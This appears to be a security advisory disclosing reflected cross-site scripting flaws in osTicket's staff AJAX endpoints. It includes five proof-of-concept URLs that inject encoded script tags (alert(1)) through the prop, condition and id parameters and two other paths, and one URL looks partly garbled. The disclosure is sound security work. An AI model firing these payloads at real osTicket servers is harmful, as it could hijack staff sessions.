Description

Cross-Site Scripting (XSS) vulnerabilities arise when data is copied from a request and echoed into the application’s immediate response in an unsafe way. An attacker can use the vulnerability to construct a request that, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user’s browser in the context of that user’s session with the application.

In this specific case, following agent authentication and regardless of administrative privileges, an attacker might take advantage of the Queue Condition functionality widely used within the web application in multiple instances, invoking add and addProperty to execute client-side malicious javascript code by exploiting the unsanitized vulnerable GET parameters prop, condition and id.

Later were found and included also further URL-based XSS vulnerabilities affecting scp/ajax.php in staff/change-department and kb/faq/1/access.

Proof of Concept (exploiting prop GET parameter in /addProperty):

http://<TARGET>/osTicket/scp/ajax.php/queue/condition/addProperty?prop=background-colorvximw%22%3e%3cscript%3ealert(1)%3c%2fscript%3edhvmt&condition=1001

Proof of Concept (exploiting condition GET parameter in /addProperty):

http://<TARGET>/osTicket/scp/ajax.php/queue/condition/addProperty?prop=color&condition=1001ljos2%22%3E%3Cscript%3Ealert(1)%3C%2fscript%3Emui2bt(1)%3C%2fscript%3Edhvmt

Proof of Concept (exploiting id GET parameter in /add):

http://<TARGET>/osTicket/scp/ajax.php/queue/condition/add?field=isassigned&object_id=9&id=1001lr5is%22%3e%3cscript%3ealert(1)%3c%2fscript%3euoq07

Proof of Concept (exploiting Reflected XSS in osTicket/scp/ajax.php/staff/change-department):

http://<TARGET>/osTicket/scp/ajax.php/staff/change-departmenthpwc8%22%3e%3cscript%3ealert(1)%3c/script%3em7dak

Proof of Concept (exploiting Reflected XSS in osTicket/scp/ajax.php/kb/faq/1/access):

http://<TARGET>/osTicket/scp/ajax.php/kb/faq/1/accessmztvw%22%3e%3cscript%3ealert(1)%3c/script%3ez2p1d